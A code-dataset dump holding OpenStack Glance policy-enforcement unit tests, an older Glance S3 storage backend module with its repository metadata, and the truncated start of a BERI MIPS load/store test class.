"bytes": "3204"
},
{
"name": "Python",
"bytes": "76440000"
},
{
"name": "R",
"bytes": "2445"
},
{
"name": "Roff",
"bytes": "95764"
},
{
"name": "Ruby",
"bytes": "1098"
},
{
"name": "Rust",
"bytes": "495"
},
{
"name": "Scala",
"bytes": "1541"
},
{
"name": "Scheme",
"bytes": "559"
},
{
"name": "Shell",
"bytes": "190718"
},
{
"name": "Smarty",
"bytes": "130"
},
{
"name": "TSQL",
"bytes": "10013"
},
{
"name": "Tcl",
"bytes": "899"
},
{
"name": "TeX",
"bytes": "165743"
},
{
"name": "Thrift",
"bytes": "317058"
},
{
"name": "TypeScript",
"bytes": "1607"
},
{
"name": "VBA",
"bytes": "2884"
},
{
"name": "VBScript",
"bytes": "938"
},
{
"name": "VHDL",
"bytes": "830"
},
{
"name": "Vala",
"bytes": "485"
},
{
"name": "Verilog",
"bytes": "274"
},
{
"name": "Vim Snippet",
"bytes": "226931"
},
{
"name": "XQuery",
"bytes": "114"
},
{
"name": "XSLT",
"bytes": "521413"
},
{
"name": "Yacc",
"bytes": "2133855"
}
],
"symlink_target": ""
} |
from collections import abc
from unittest import mock
import hashlib
import os.path
import oslo_config.cfg
from oslo_policy import policy as common_policy
import glance.api.policy
from glance.common import exception
import glance.context
from glance.policies import base as base_policy
from glance.tests.unit import base
UUID1 = 'c80a1a6c-bd1f-41c5-90ee-81afedb1d58d'
class IterableMock(mock.Mock, abc.Iterable):
def __iter__(self):
while False:
yield None
class ImageRepoStub(object):
def __init__(self):
self.db_api = mock.Mock()
self.db_api.image_member_find.return_value = [
{'member': 'foo'}
]
def get(self, *args, **kwargs):
context = mock.Mock()
policy = mock.Mock()
return glance.api.policy.ImageProxy(
ImageStub(image_id=UUID1), context, policy
)
def save(self, *args, **kwargs):
return 'image_from_save'
def add(self, *args, **kwargs):
return 'image_from_add'
def list(self, *args, **kwargs):
return ['image_from_list_0', 'image_from_list_1']
class ImageStub(object):
def __init__(self, image_id=None, visibility='private',
container_format='bear', disk_format='raw',
status='active', extra_properties=None,
os_hidden=False):
if extra_properties is None:
extra_properties = {}
self.image_id = image_id
self.visibility = visibility
self.container_format = container_format
self.disk_format = disk_format
self.status = status
self.extra_properties = extra_properties
self.checksum = 'c2e5db72bd7fd153f53ede5da5a06de3'
self.os_hash_algo = 'sha512'
self.os_hash_value = hashlib.sha512(b'glance').hexdigest()
self.created_at = '2013-09-28T15:27:36Z'
self.updated_at = '2013-09-28T15:27:37Z'
self.locations = []
self.min_disk = 0
self.min_ram = 0
self.name = 'image_name'
self.owner = 'tenant1'
self.protected = False
self.size = 0
self.virtual_size = 0
self.tags = []
self.os_hidden = os_hidden
self.member = self.owner
def delete(self):
self.status = 'deleted'
class ImageFactoryStub(object):
def new_image(self, image_id=None, name=None, visibility='private',
min_disk=0, min_ram=0, protected=False, owner=None,
disk_format=None, container_format=None,
extra_properties=None, hidden=False, tags=None,
**other_args):
self.visibility = visibility
self.hidden = hidden
return 'new_image'
class MemberRepoStub(object):
image = None
def add(self, image_member):
image_member.output = 'member_repo_add'
def get(self, *args, **kwargs):
return 'member_repo_get'
def save(self, image_member, from_state=None):
image_member.output = 'member_repo_save'
def list(self, *args, **kwargs):
return 'member_repo_list'
def remove(self, image_member):
image_member.output = 'member_repo_remove'
class ImageMembershipStub(object):
def __init__(self, output=None):
self.output = output
class TaskRepoStub(object):
def get(self, *args, **kwargs):
return 'task_from_get'
def add(self, *args, **kwargs):
return 'task_from_add'
def list(self, *args, **kwargs):
return ['task_from_list_0', 'task_from_list_1']
class TaskStub(object):
def __init__(self, task_id):
self.task_id = task_id
self.status = 'pending'
def run(self, executor):
self.status = 'processing'
class TaskFactoryStub(object):
def new_task(self, *args):
return 'new_task'
class MdNamespaceRepoStub(object):
def add(self, namespace):
return 'mdns_add'
def get(self, namespace):
return 'mdns_get'
def list(self, *args, **kwargs):
return ['mdns_list']
def save(self, namespace):
return 'mdns_save'
def remove(self, namespace):
return 'mdns_remove'
def remove_tags(self, namespace):
return 'mdtags_remove'
class MdObjectRepoStub(object):
def add(self, obj):
return 'mdobj_add'
def get(self, ns, obj_name):
return 'mdobj_get'
def list(self, *args, **kwargs):
return ['mdobj_list']
def save(self, obj):
return 'mdobj_save'
def remove(self, obj):
return 'mdobj_remove'
class MdResourceTypeRepoStub(object):
def add(self, rt):
return 'mdrt_add'
def get(self, *args, **kwargs):
return 'mdrt_get'
def list(self, *args, **kwargs):
return ['mdrt_list']
def remove(self, *args, **kwargs):
return 'mdrt_remove'
class MdPropertyRepoStub(object):
def add(self, prop):
return 'mdprop_add'
def get(self, ns, prop_name):
return 'mdprop_get'
def list(self, *args, **kwargs):
return ['mdprop_list']
def save(self, prop):
return 'mdprop_save'
def remove(self, prop):
return 'mdprop_remove'
class MdTagRepoStub(object):
def add(self, tag):
return 'mdtag_add'
def add_tags(self, tags, can_append=False):
return ['mdtag_add_tags']
def get(self, ns, tag_name):
return 'mdtag_get'
def list(self, *args, **kwargs):
return ['mdtag_list']
def save(self, tag):
return 'mdtag_save'
def remove(self, tag):
return 'mdtag_remove'
class TestPolicyEnforcer(base.IsolatedUnitTest):
def test_policy_enforce_unregistered(self):
enforcer = glance.api.policy.Enforcer(
suppress_deprecation_warnings=True)
context = glance.context.RequestContext(roles=[])
self.assertRaises(glance.api.policy.policy.PolicyNotRegistered,
enforcer.enforce,
context, 'wibble', {})
def test_policy_check_unregistered(self):
enforcer = glance.api.policy.Enforcer(
suppress_deprecation_warnings=True)
context = glance.context.RequestContext(roles=[])
self.assertRaises(glance.api.policy.policy.PolicyNotRegistered,
enforcer.check,
context, 'wibble', {})
def test_policy_file_default_rules_default_location(self):
enforcer = glance.api.policy.Enforcer(
suppress_deprecation_warnings=True)
context = glance.context.RequestContext(roles=['reader'])
enforcer.enforce(context, 'get_image',
{'project_id': context.project_id})
def test_policy_file_custom_rules_default_location(self):
rules = {"get_image": '!'}
self.set_policy_rules(rules)
enforcer = glance.api.policy.Enforcer(
suppress_deprecation_warnings=True)
context = glance.context.RequestContext(roles=[])
self.assertRaises(exception.Forbidden,
enforcer.enforce, context, 'get_image', {})
def test_policy_file_custom_location(self):
self.config(policy_file=os.path.join(self.test_dir, 'gobble.gobble'),
group='oslo_policy')
rules = {"get_image": '!'}
self.set_policy_rules(rules)
enforcer = glance.api.policy.Enforcer(
suppress_deprecation_warnings=True)
context = glance.context.RequestContext(roles=[])
self.assertRaises(exception.Forbidden,
enforcer.enforce, context, 'get_image', {})
def test_policy_file_check(self):
self.config(policy_file=os.path.join(self.test_dir, 'gobble.gobble'),
group='oslo_policy')
rules = {"get_image": '!'}
self.set_policy_rules(rules)
enforcer = glance.api.policy.Enforcer(
suppress_deprecation_warnings=True)
context = glance.context.RequestContext(roles=[])
self.assertEqual(False, enforcer.check(context, 'get_image', {}))
def test_policy_file_get_image_default_everybody(self):
rules = {"default": ''}
self.set_policy_rules(rules)
enforcer = glance.api.policy.Enforcer(
suppress_deprecation_warnings=True)
context = glance.context.RequestContext(roles=[])
self.assertEqual(True, enforcer.check(context, 'get_image', {}))
def test_policy_file_get_image_default_nobody(self):
rules = {"default": '!'}
self.set_policy_rules(rules)
enforcer = glance.api.policy.Enforcer(
suppress_deprecation_warnings=True)
context = glance.context.RequestContext(roles=[])
self.assertRaises(exception.Forbidden,
enforcer.enforce, context, 'get_image', {})
def _test_enforce_scope(self):
policy_name = 'foo'
rule = common_policy.RuleDefault(
name=policy_name, check_str='role:bar', scope_types=['system'])
enforcer = glance.api.policy.Enforcer(
suppress_deprecation_warnings=True)
enforcer.register_default(rule)
context = glance.context.RequestContext(
user_id='user', project_id='project', roles=['bar'])
target = {}
return enforcer.enforce(context, policy_name, target)
def test_policy_enforcer_raises_forbidden_when_enforcing_scope(self):
# Make sure we raise an exception if the context scope doesn't match
# the scope of the rule when oslo.policy is configured to raise an
# exception.
self.config(enforce_scope=True, group='oslo_policy')
self.assertRaises(exception.Forbidden, self._test_enforce_scope)
def test_policy_enforcer_does_not_raise_forbidden(self):
# Make sure we don't raise an exception for mismatched scopes unless
# oslo.policy is configured to do so.
self.config(enforce_scope=False, group='oslo_policy')
self.assertTrue(self._test_enforce_scope())
def test_ensure_context_object_is_passed_to_policy_enforcement(self):
# The oslo.policy Enforcer does some useful translation for us if we
# pass it an oslo.context.RequestContext object. This prevents us from
# having to handle the translation to a valid credential dictionary in
# glance.
context = glance.context.RequestContext()
mock_enforcer = self.mock_object(common_policy.Enforcer, 'enforce')
enforcer = glance.api.policy.Enforcer(
suppress_deprecation_warnings=True)
enforcer.register_default(
common_policy.RuleDefault(name='foo', check_str='role:bar')
)
enforcer.enforce(context, 'foo', {})
mock_enforcer.assert_called_once_with('foo', {}, context,
do_raise=True,
exc=exception.Forbidden,
action='foo')
# Reset the mock and make sure glance.api.policy.Enforcer.check()
# behaves the same way.
mock_enforcer.reset_mock()
enforcer.check(context, 'foo', {})
mock_enforcer.assert_called_once_with('foo', {}, context)
def test_ensure_experimental_warning_is_logged_for_secure_rbac(self):
self.config(enforce_new_defaults=True, group='oslo_policy')
self.config(enforce_secure_rbac=True)
expected_log_string = (
"Deploying glance with secure RBAC personas enabled via "
"`glance-api.conf [DEFAULT] enforce_secure_rbac=True` and "
"`glance-api.conf [oslo_policy] enforce_new_defaults=True` "
"is marked as EXPERIMENTAL in Wallaby. The status of this "
"feature will graduate to SUPPORTED as glance adopts more "
"personas, specifically for system-scope."
)
with mock.patch.object(glance.api.policy, 'LOG') as mock_log:
glance.api.policy.Enforcer(
suppress_deprecation_warnings=True)
mock_log.warning.assert_called_once_with(expected_log_string)
def test_ensure_experimental_warning_is_not_logged_for_legacy_rbac(self):
self.config(enforce_new_defaults=False, group='oslo_policy')
with mock.patch.object(glance.api.policy, 'LOG') as mock_log:
glance.api.policy.Enforcer(
suppress_deprecation_warnings=True)
mock_log.warning.assert_not_called()
class TestPolicyEnforcerNoFile(base.IsolatedUnitTest):
def test_policy_file_specified_but_not_found(self):
"""Missing defined policy file should result in a default ruleset"""
self.config(policy_file='gobble.gobble', group='oslo_policy')
self.config(enforce_new_defaults=True, group='oslo_policy')
enforcer = glance.api.policy.Enforcer(
suppress_deprecation_warnings=True)
context = glance.context.RequestContext(roles=[])
self.assertRaises(exception.Forbidden,
enforcer.enforce, context, 'manage_image_cache', {})
admin_context = glance.context.RequestContext(roles=['admin'])
enforcer.enforce(admin_context, 'manage_image_cache', {})
def test_policy_file_default_not_found(self):
"""Missing default policy file should result in a default ruleset"""
self.config(enforce_new_defaults=True, group='oslo_policy')
def fake_find_file(self, name):
return None
self.mock_object(oslo_config.cfg.ConfigOpts, 'find_file',
fake_find_file)
enforcer = glance.api.policy.Enforcer(
suppress_deprecation_warnings=True)
context = glance.context.RequestContext(roles=[])
self.assertRaises(exception.Forbidden,
enforcer.enforce, context, 'manage_image_cache', {})
admin_context = glance.context.RequestContext(roles=['admin'])
enforcer.enforce(admin_context, 'manage_image_cache', {})
class TestContextPolicyEnforcer(base.IsolatedUnitTest):
def _do_test_policy_influence_context_admin(self,
policy_admin_role,
context_role,
context_is_admin,
admin_expected):
self.config(policy_file=os.path.join(self.test_dir, 'gobble.gobble'),
group='oslo_policy')
rules = {'context_is_admin': 'role:%s' % policy_admin_role}
self.set_policy_rules(rules)
enforcer = glance.api.policy.Enforcer(
suppress_deprecation_warnings=True)
context = glance.context.RequestContext(roles=[context_role],
is_admin=context_is_admin,
policy_enforcer=enforcer)
self.assertEqual(admin_expected, context.is_admin)
def test_context_admin_policy_admin(self):
self._do_test_policy_influence_context_admin('test_admin',
'test_admin',
True,
True)
def test_context_nonadmin_policy_admin(self):
self._do_test_policy_influence_context_admin('test_admin',
'test_admin',
False,
True)
def test_context_admin_policy_nonadmin(self):
self._do_test_policy_influence_context_admin('test_admin',
'demo',
True,
True)
def test_context_nonadmin_policy_nonadmin(self):
self._do_test_policy_influence_context_admin('test_admin',
'demo',
False,
False)
class TestDefaultPolicyCheckStrings(base.IsolatedUnitTest):
def test_project_member_check_string(self):
expected = 'role:member and project_id:%(project_id)s'
self.assertEqual(expected, base_policy.PROJECT_MEMBER)
def test_admin_or_project_member_check_string(self):
expected = 'role:admin or (role:member and project_id:%(project_id)s)'
self.assertEqual(expected, base_policy.ADMIN_OR_PROJECT_MEMBER)
def test_project_member_download_image_check_string(self):
expected = (
"role:member and (project_id:%(project_id)s or "
"project_id:%(member_id)s or 'community':%(visibility)s or "
"'public':%(visibility)s or 'shared':%(visibility)s)"
)
self.assertEqual(
expected,
base_policy.
PROJECT_MEMBER_OR_IMAGE_MEMBER_OR_COMMUNITY_OR_PUBLIC_OR_SHARED
)
def test_project_reader_check_string(self):
expected = 'role:reader and project_id:%(project_id)s'
self.assertEqual(expected, base_policy.PROJECT_READER)
def test_admin_or_project_reader_check_string(self):
expected = 'role:admin or (role:reader and project_id:%(project_id)s)'
self.assertEqual(expected, base_policy.ADMIN_OR_PROJECT_READER)
def test_project_reader_get_image_check_string(self):
expected = (
"role:reader and (project_id:%(project_id)s or "
"project_id:%(member_id)s or \'community\':%(visibility)s or "
"'public':%(visibility)s or 'shared':%(visibility)s)"
)
self.assertEqual(
expected,
base_policy.
PROJECT_READER_OR_IMAGE_MEMBER_OR_COMMUNITY_OR_PUBLIC_OR_SHARED
)
class TestImageTarget(base.IsolatedUnitTest):
def test_image_target_ignores_locations(self):
image = ImageStub()
target = glance.api.policy.ImageTarget(image)
self.assertNotIn('locations', list(target))
def test_image_target_project_id_alias(self):
image = ImageStub()
target = glance.api.policy.ImageTarget(image)
self.assertIn('project_id', target)
self.assertEqual(image.owner, target['project_id'])
self.assertEqual(image.owner, target['owner'])
def test_image_target_transforms(self):
fake_image = mock.MagicMock()
fake_image.image_id = mock.sentinel.image_id
fake_image.owner = mock.sentinel.owner
fake_image.member = mock.sentinel.member
target = glance.api.policy.ImageTarget(fake_image)
# Make sure the key transforms work
self.assertEqual(mock.sentinel.image_id, target['id'])
self.assertEqual(mock.sentinel.owner, target['project_id'])
self.assertEqual(mock.sentinel.member, target['member_id'])
# Also make sure the base properties still work
self.assertEqual(mock.sentinel.image_id, target['image_id'])
self.assertEqual(mock.sentinel.owner, target['owner'])
self.assertEqual(mock.sentinel.member, target['member'])
| {
"content_hash": "a0c084a7e939477154dc8bce4ef1454a",
"timestamp": "",
"source": "github",
"line_count": 560,
"max_line_length": 78,
"avg_line_length": 34.4125,
"alnum_prop": 0.5948316122671371,
"repo_name": "openstack/glance",
"id": "70ad783e7acae75f4c9b03d0fecb82882c782d41",
"size": "19934",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "glance/tests/unit/test_policy.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C++",
"bytes": "1353"
},
{
"name": "Mako",
"bytes": "431"
},
{
"name": "Python",
"bytes": "4008354"
},
{
"name": "Shell",
"bytes": "3184"
}
],
"symlink_target": ""
} |
"""Storage backend for S3 or Storage Servers that follow the S3 Protocol"""
import hashlib
import httplib
import re
import tempfile
import urlparse
from oslo.config import cfg
from glance.common import exception
from glance.common import utils
import glance.openstack.common.log as logging
import glance.store
import glance.store.base
import glance.store.location
LOG = logging.getLogger(__name__)
s3_opts = [
cfg.StrOpt('s3_store_host',
help=_('The host where the S3 server is listening.')),
cfg.StrOpt('s3_store_access_key', secret=True,
help=_('The S3 query token access key.')),
cfg.StrOpt('s3_store_secret_key', secret=True,
help=_('The S3 query token secret key.')),
cfg.StrOpt('s3_store_bucket',
help=_('The S3 bucket to be used to store the Glance data.')),
cfg.StrOpt('s3_store_object_buffer_dir',
help=_('The local directory where uploads will be staged '
'before they are transfered into S3.')),
cfg.BoolOpt('s3_store_create_bucket_on_put', default=False,
help=_('A boolean to determine if the S3 bucket should be '
'created on upload if it does not exist or if '
'an error should be returned to the user.')),
cfg.StrOpt('s3_store_bucket_url_format', default='subdomain',
help=_('The S3 calling format used to determine the bucket. '
'Either subdomain or path can be used.')),
]
CONF = cfg.CONF
CONF.register_opts(s3_opts)
class StoreLocation(glance.store.location.StoreLocation):
"""
Class describing an S3 URI. An S3 URI can look like any of
the following:
s3://accesskey:secretkey@s3.amazonaws.com/bucket/key-id
s3+http://accesskey:secretkey@s3.amazonaws.com/bucket/key-id
s3+https://accesskey:secretkey@s3.amazonaws.com/bucket/key-id
The s3+https:// URIs indicate there is an HTTPS s3service URL
"""
def process_specs(self):
self.scheme = self.specs.get('scheme', 's3')
self.accesskey = self.specs.get('accesskey')
self.secretkey = self.specs.get('secretkey')
s3_host = self.specs.get('s3serviceurl')
self.bucket = self.specs.get('bucket')
self.key = self.specs.get('key')
if s3_host.startswith('https://'):
self.scheme = 's3+https'
s3_host = s3_host[8:].strip('/')
elif s3_host.startswith('http://'):
s3_host = s3_host[7:].strip('/')
self.s3serviceurl = s3_host.strip('/')
def _get_credstring(self):
if self.accesskey:
return '%s:%s@' % (self.accesskey, self.secretkey)
return ''
def get_uri(self):
return "%s://%s%s/%s/%s" % (
self.scheme,
self._get_credstring(),
self.s3serviceurl,
self.bucket,
self.key)
def parse_uri(self, uri):
"""
Parse URLs. This method fixes an issue where credentials specified
in the URL are interpreted differently in Python 2.6.1+ than prior
versions of Python.
Note that an Amazon AWS secret key can contain the forward slash,
which is entirely retarded, and breaks urlparse miserably.
This function works around that issue.
"""
# Make sure that URIs that contain multiple schemes, such as:
# s3://accesskey:secretkey@https://s3.amazonaws.com/bucket/key-id
# are immediately rejected.
if uri.count('://') != 1:
reason = _("URI cannot contain more than one occurrence "
"of a scheme. If you have specified a URI like "
"s3://accesskey:secretkey@"
"https://s3.amazonaws.com/bucket/key-id"
", you need to change it to use the "
"s3+https:// scheme, like so: "
"s3+https://accesskey:secretkey@"
"s3.amazonaws.com/bucket/key-id")
LOG.debug(_("Invalid store uri: %s") % reason)
raise exception.BadStoreUri(message=reason)
pieces = urlparse.urlparse(uri)
assert pieces.scheme in ('s3', 's3+http', 's3+https')
self.scheme = pieces.scheme
path = pieces.path.strip('/')
netloc = pieces.netloc.strip('/')
entire_path = (netloc + '/' + path).strip('/')
if '@' in uri:
creds, path = entire_path.split('@')
cred_parts = creds.split(':')
try:
access_key = cred_parts[0]
secret_key = cred_parts[1]
# NOTE(jaypipes): Need to encode to UTF-8 here because of a
# bug in the HMAC library that boto uses.
# See: http://bugs.python.org/issue5285
# See: http://trac.edgewall.org/ticket/8083
access_key = access_key.encode('utf-8')
secret_key = secret_key.encode('utf-8')
self.accesskey = access_key
self.secretkey = secret_key
except IndexError:
reason = _("Badly formed S3 credentials %s") % creds
LOG.debug(reason)
raise exception.BadStoreUri()
else:
self.accesskey = None
path = entire_path
try:
path_parts = path.split('/')
self.key = path_parts.pop()
self.bucket = path_parts.pop()
if path_parts:
self.s3serviceurl = '/'.join(path_parts).strip('/')
else:
reason = _("Badly formed S3 URI. Missing s3 service URL.")
raise exception.BadStoreUri()
except IndexError:
reason = _("Badly formed S3 URI: %s") % uri
LOG.debug(reason)
raise exception.BadStoreUri()
class ChunkedFile(object):
"""
We send this back to the Glance API server as
something that can iterate over a ``boto.s3.key.Key``
"""
CHUNKSIZE = 65536
def __init__(self, fp):
self.fp = fp
def __iter__(self):
"""Return an iterator over the image file"""
try:
if self.fp:
while True:
chunk = self.fp.read(ChunkedFile.CHUNKSIZE)
if chunk:
yield chunk
else:
break
finally:
self.close()
def getvalue(self):
"""Return entire string value... used in testing."""
data = ""
self.len = 0
for chunk in self:
read_bytes = len(chunk)
data = data + chunk
self.len = self.len + read_bytes
return data
def close(self):
"""Close the internal file pointer."""
if self.fp:
self.fp.close()
self.fp = None
class Store(glance.store.base.Store):
"""An implementation of the s3 adapter."""
EXAMPLE_URL = "s3://<ACCESS_KEY>:<SECRET_KEY>@<S3_URL>/<BUCKET>/<OBJ>"
def get_schemes(self):
return ('s3', 's3+http', 's3+https')
def configure_add(self):
"""
Configure the Store to use the stored configuration options
Any store that needs special configuration should implement
this method. If the store was not able to successfully configure
itself, it should raise `exception.BadStoreConfiguration`
"""
self.s3_host = self._option_get('s3_store_host')
access_key = self._option_get('s3_store_access_key')
secret_key = self._option_get('s3_store_secret_key')
# NOTE(jaypipes): Need to encode to UTF-8 here because of a
# bug in the HMAC library that boto uses.
# See: http://bugs.python.org/issue5285
# See: http://trac.edgewall.org/ticket/8083
self.access_key = access_key.encode('utf-8')
self.secret_key = secret_key.encode('utf-8')
self.bucket = self._option_get('s3_store_bucket')
self.scheme = 's3'
if self.s3_host.startswith('https://'):
self.scheme = 's3+https'
self.full_s3_host = self.s3_host
elif self.s3_host.startswith('http://'):
self.full_s3_host = self.s3_host
else: # Defaults http
self.full_s3_host = 'http://' + self.s3_host
self.s3_store_object_buffer_dir = CONF.s3_store_object_buffer_dir
def _option_get(self, param):
result = getattr(CONF, param)
if not result:
reason = (_("Could not find %(param)s in configuration "
"options.") % {'param': param})
LOG.debug(reason)
raise exception.BadStoreConfiguration(store_name="s3",
reason=reason)
return result
def get(self, location):
"""
Takes a `glance.store.location.Location` object that indicates
where to find the image file, and returns a tuple of generator
(for reading the image file) and image_size
:param location `glance.store.location.Location` object, supplied
from glance.store.location.get_location_from_uri()
:raises `glance.exception.NotFound` if image does not exist
"""
key = self._retrieve_key(location)
key.BufferSize = self.CHUNKSIZE
class ChunkedIndexable(glance.store.Indexable):
def another(self):
return (self.wrapped.fp.read(ChunkedFile.CHUNKSIZE)
if self.wrapped.fp else None)
return (ChunkedIndexable(ChunkedFile(key), key.size), key.size)
def get_size(self, location):
"""
Takes a `glance.store.location.Location` object that indicates
where to find the image file, and returns the image_size (or 0
if unavailable)
:param location `glance.store.location.Location` object, supplied
from glance.store.location.get_location_from_uri()
"""
try:
key = self._retrieve_key(location)
return key.size
except Exception:
return 0
def _retrieve_key(self, location):
loc = location.store_location
from boto.s3.connection import S3Connection
s3_conn = S3Connection(loc.accesskey, loc.secretkey,
host=loc.s3serviceurl,
is_secure=(loc.scheme == 's3+https'),
calling_format=get_calling_format())
bucket_obj = get_bucket(s3_conn, loc.bucket)
key = get_key(bucket_obj, loc.key)
msg = _("Retrieved image object from S3 using (s3_host=%(s3_host)s, "
"access_key=%(accesskey)s, bucket=%(bucket)s, "
"key=%(obj_name)s)") % ({'s3_host': loc.s3serviceurl,
'accesskey': loc.accesskey,
'bucket': loc.bucket,
'obj_name': loc.key})
LOG.debug(msg)
return key
def add(self, image_id, image_file, image_size):
"""
Stores an image file with supplied identifier to the backend
storage system and returns a tuple containing information
about the stored image.
:param image_id: The opaque image identifier
:param image_file: The image data to write, as a file-like object
:param image_size: The size of the image data to write, in bytes
:retval tuple of URL in backing store, bytes written, checksum
and a dictionary with storage system specific information
:raises `glance.common.exception.Duplicate` if the image already
existed
S3 writes the image data using the scheme:
s3://<ACCESS_KEY>:<SECRET_KEY>@<S3_URL>/<BUCKET>/<OBJ>
where:
<USER> = ``s3_store_user``
<KEY> = ``s3_store_key``
<S3_HOST> = ``s3_store_host``
<BUCKET> = ``s3_store_bucket``
<ID> = The id of the image being added
"""
from boto.s3.connection import S3Connection
loc = StoreLocation({'scheme': self.scheme,
'bucket': self.bucket,
'key': image_id,
's3serviceurl': self.full_s3_host,
'accesskey': self.access_key,
'secretkey': self.secret_key})
s3_conn = S3Connection(loc.accesskey, loc.secretkey,
host=loc.s3serviceurl,
is_secure=(loc.scheme == 's3+https'),
calling_format=get_calling_format())
create_bucket_if_missing(self.bucket, s3_conn)
bucket_obj = get_bucket(s3_conn, self.bucket)
obj_name = str(image_id)
def _sanitize(uri):
return re.sub('//.*:.*@',
'//s3_store_secret_key:s3_store_access_key@',
uri)
key = bucket_obj.get_key(obj_name)
if key and key.exists():
raise exception.Duplicate(_("S3 already has an image at "
"location %s") %
_sanitize(loc.get_uri()))
msg = _("Adding image object to S3 using (s3_host=%(s3_host)s, "
"access_key=%(access_key)s, bucket=%(bucket)s, "
"key=%(obj_name)s)") % ({'s3_host': self.s3_host,
'access_key': self.access_key,
'bucket': self.bucket,
'obj_name': obj_name})
LOG.debug(msg)
key = bucket_obj.new_key(obj_name)
# We need to wrap image_file, which is a reference to the
# webob.Request.body_file, with a seekable file-like object,
# otherwise the call to set_contents_from_file() will die
# with an error about Input object has no method 'seek'. We
# might want to call webob.Request.make_body_seekable(), but
# unfortunately, that method copies the entire image into
# memory and results in LP Bug #818292 occurring. So, here
# we write temporary file in as memory-efficient manner as
# possible and then supply the temporary file to S3. We also
# take this opportunity to calculate the image checksum while
# writing the tempfile, so we don't need to call key.compute_md5()
msg = _("Writing request body file to temporary file "
"for %s") % _sanitize(loc.get_uri())
LOG.debug(msg)
tmpdir = self.s3_store_object_buffer_dir
temp_file = tempfile.NamedTemporaryFile(dir=tmpdir)
checksum = hashlib.md5()
for chunk in utils.chunkreadable(image_file, self.CHUNKSIZE):
checksum.update(chunk)
temp_file.write(chunk)
temp_file.flush()
msg = (_("Uploading temporary file to S3 for %s") %
_sanitize(loc.get_uri()))
LOG.debug(msg)
# OK, now upload the data into the key
key.set_contents_from_file(open(temp_file.name, 'r+b'), replace=False)
size = key.size
checksum_hex = checksum.hexdigest()
LOG.debug(_("Wrote %(size)d bytes to S3 key named %(obj_name)s "
"with checksum %(checksum_hex)s"),
{'size': size, 'obj_name': obj_name,
'checksum_hex': checksum_hex})
return (loc.get_uri(), size, checksum_hex, {})
def delete(self, location):
"""
Takes a `glance.store.location.Location` object that indicates
where to find the image file to delete
:location `glance.store.location.Location` object, supplied
from glance.store.location.get_location_from_uri()
:raises NotFound if image does not exist
"""
loc = location.store_location
from boto.s3.connection import S3Connection
s3_conn = S3Connection(loc.accesskey, loc.secretkey,
host=loc.s3serviceurl,
is_secure=(loc.scheme == 's3+https'),
calling_format=get_calling_format())
bucket_obj = get_bucket(s3_conn, loc.bucket)
# Close the key when we're through.
key = get_key(bucket_obj, loc.key)
msg = _("Deleting image object from S3 using (s3_host=%(s3_host)s, "
"access_key=%(accesskey)s, bucket=%(bucket)s, "
"key=%(obj_name)s)") % ({'s3_host': loc.s3serviceurl,
'accesskey': loc.accesskey,
'bucket': loc.bucket,
'obj_name': loc.key})
LOG.debug(msg)
return key.delete()
def get_bucket(conn, bucket_id):
"""
Get a bucket from an s3 connection
:param conn: The ``boto.s3.connection.S3Connection``
:param bucket_id: ID of the bucket to fetch
:raises ``glance.exception.NotFound`` if bucket is not found.
"""
bucket = conn.get_bucket(bucket_id)
if not bucket:
msg = _("Could not find bucket with ID %s") % bucket_id
LOG.debug(msg)
raise exception.NotFound(msg)
return bucket
def get_s3_location(s3_host):
from boto.s3.connection import Location
locations = {
's3.amazonaws.com': Location.DEFAULT,
's3-eu-west-1.amazonaws.com': Location.EU,
's3-us-west-1.amazonaws.com': Location.USWest,
's3-ap-southeast-1.amazonaws.com': Location.APSoutheast,
's3-ap-northeast-1.amazonaws.com': Location.APNortheast,
}
# strip off scheme and port if present
key = re.sub('^(https?://)?(?P<host>[^:]+)(:[0-9]+)?$',
'\g<host>',
s3_host)
return locations.get(key, Location.DEFAULT)
def create_bucket_if_missing(bucket, s3_conn):
"""
Creates a missing bucket in S3 if the
``s3_store_create_bucket_on_put`` option is set.
:param bucket: Name of bucket to create
:param s3_conn: Connection to S3
"""
from boto.exception import S3ResponseError
try:
s3_conn.get_bucket(bucket)
except S3ResponseError as e:
if e.status == httplib.NOT_FOUND:
if CONF.s3_store_create_bucket_on_put:
location = get_s3_location(CONF.s3_store_host)
try:
s3_conn.create_bucket(bucket, location=location)
except S3ResponseError as e:
msg = (_("Failed to add bucket to S3.\n"
"Got error from S3: %(e)s") % {'e': e})
raise glance.store.BackendException(msg)
else:
msg = (_("The bucket %(bucket)s does not exist in "
"S3. Please set the "
"s3_store_create_bucket_on_put option "
"to add bucket to S3 automatically.")
% {'bucket': bucket})
raise glance.store.BackendException(msg)
def get_key(bucket, obj):
"""
Get a key from a bucket
:param bucket: The ``boto.s3.Bucket``
:param obj: Object to get the key for
:raises ``glance.exception.NotFound`` if key is not found.
"""
key = bucket.get_key(obj)
if not key or not key.exists():
msg = (_("Could not find key %(obj)s in bucket %(bucket)s") %
{'obj': obj, 'bucket': bucket})
LOG.debug(msg)
raise exception.NotFound(msg)
return key
def get_calling_format(bucket_format=None):
import boto.s3.connection
if bucket_format is None:
bucket_format = CONF.s3_store_bucket_url_format
if bucket_format.lower() == 'path':
return boto.s3.connection.OrdinaryCallingFormat()
else:
return boto.s3.connection.SubdomainCallingFormat()
| {
"content_hash": "283087289edee551b890122855df7556",
"timestamp": "",
"source": "github",
"line_count": 527,
"max_line_length": 78,
"avg_line_length": 38.04933586337761,
"alnum_prop": 0.5532615200478755,
"repo_name": "cloudbau/glance",
"id": "d9638212f01a119388f1bbac6715ec7d69585692",
"size": "20733",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "glance/store/s3.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "2489476"
},
{
"name": "Shell",
"bytes": "3488"
}
],
"symlink_target": ""
} |
from beritest_tools import BaseBERITestCase
class test_raw_sw(BaseBERITestCase):
def test_a0(self):
'''Test unsigned load of stored word from double word'''
self.assertRegisterEqual(self.MIPS.a0, 0xfedcba98, "Unsigned load of word from double word failed")
def test_a1(self):
'''Test signed load of stored positive word'''
self.assertRegisterEqual(self.MIPS.a1, 1, "Sign-extended load of positive word failed")
def test_a2(self):
'''Test signed load of stored negative word'''
self.assertRegisterEqual(self.MIPS.a2, 0xffffffffffffffff, "Sign-extended load of negative word failed")
def test_a3(self):
'''Test unsigned load of stored positive word'''
self.assertRegisterEqual(self.MIPS.a3, 1, "Unsigned load of positive word failed")
def test_a4(self):
'''Test unsigned load of stored negative word'''
